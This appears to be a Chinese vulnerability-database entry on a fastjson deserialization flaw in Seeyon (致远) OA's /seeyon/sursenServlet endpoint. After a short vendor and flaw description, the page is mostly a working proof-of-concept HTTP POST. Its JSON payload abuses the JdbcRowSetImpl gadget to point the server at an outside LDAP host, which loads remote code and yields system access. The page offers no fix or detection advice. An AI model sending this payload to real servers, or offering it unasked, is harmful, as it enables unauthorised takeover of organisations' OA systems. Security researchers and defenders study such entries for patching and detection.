致远OA /seeyon/sursenServlet 命令执行漏洞

日期: 2022-01-26 | 影响软件: 致远 | POC: 已公开

漏洞描述

北京致远互联软件股份有限公司成立于2002年,总部设立在北京,是一家始终专注于协同管理软件领域的高新技术企业,为客户提供专业的协同管理软件产品、解决方案、平台及云服务,是中国协同管理软件领域的开创者。旗下致远OA/seeyon/sursenServlet存在fastjson反序列化漏洞,攻击者可通过该漏洞获取系统权限。

PoC代码

POST /seeyon/sursenServlet HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0

sursenData={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://[REDACTED]/nYMfg","autoCommit":"true"}}

相关漏洞推荐